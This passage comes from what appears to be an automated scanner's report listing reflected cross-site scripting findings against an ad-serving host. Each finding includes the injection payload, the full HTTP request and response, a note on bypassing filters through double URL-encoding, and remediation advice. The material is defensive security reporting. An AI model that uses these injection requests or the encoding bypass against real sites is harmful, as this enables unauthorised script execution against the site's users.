Set-Cookie: i_1=33:353:811:3:0:34115:1296351691:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:41:31 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 875

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8dc491'-alert(1)-'2e6b8e0e1b9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.111. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bdca'-alert(1)-'8e62565ed1b was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ2bdca'-alert(1)-'8e62565ed1b&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:14 GMT; path=/
Set-Cookie: i_1=33:353:78:3:0:34115:1296351674:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:41:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 872

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ2bdca'-alert(1)-'8e62565ed1b&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.112. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d80d9%2522%253balert%25281%2529%252f%252f1b378966a2b was submitted in the REST URL parameter 2. This input was echoed as d80d9";alert(1)//1b378966a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d80d9%2522%253balert%25281%2529%252f%252f1b378966a2b/353.0.js.120x30/1296350884** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357d80d9";alert(1)//1b378966a2b/353.0.js.120x30/1296353113**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.113. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a19%2522%253balert%25281%2529%252f%252fee7b513d736 was submitted in the REST URL parameter 3. This input was echoed as 67a19";alert(1)//ee7b513d736 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3067a19%2522%253balert%25281%2529%252f%252fee7b513d736/1296350884** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3067a19";alert(1)//ee7b513d736/1296353115**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77762'-alert(1)-'d9eb44523fa was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=2825348877762'-alert(1)-'d9eb44523fa&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:35 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34115:1296351635:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:35 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 876

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=2825348877762'-alert(1)-'d9eb44523fa&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
   
...[SNIP]...

5.115. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64672'-alert(1)-'6bd526f1d90 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G64672'-alert(1)-'6bd526f1d90&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:22 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34115:1296351622:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:22 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 876

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G64672'-alert(1)-'6bd526f1d90&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       functio
...[SNIP]...

5.116. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4276'-alert(1)-'863aa542d6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&f4276'-alert(1)-'863aa542d6f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:42:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:42:56 GMT; path=/
Set-Cookie: i_1=33:353:811:3:0:34115:1296351776:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:42:56 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 878

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&f4276'-alert(1)-'863aa542d6f=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

5.117. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bdbc'-alert(1)-'ace8d71b6ef was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=80106398bdbc'-alert(1)-'ace8d71b6ef&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:18 GMT; path=/
Set-Cookie: i_1=33:353:812:3:0:38345:1296398958:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:49:18 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=80106398bdbc'-alert(1)-'ace8d71b6ef&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

5.118. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fc35'-alert(1)-'1d1a7e71671 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!6fc35'-alert(1)-'1d1a7e71671&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:02 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:38345:1296398942:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:49:02 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!6fc35'-alert(1)-'1d1a7e71671&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.119. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf10'-alert(1)-'1127fd83b50 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894bdf10'-alert(1)-'1127fd83b50&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:14 GMT; path=/
Set-Cookie: i_1=33:353:811:3:0:38345:1296399014:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894bdf10'-alert(1)-'1127fd83b50&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.120. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d94a'-alert(1)-'4c886f70b75 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f99d94a'-alert(1)-'4c886f70b75 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:32 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:38345:1296399032:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:32 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsodOOBClick() {
       var i = new Image();
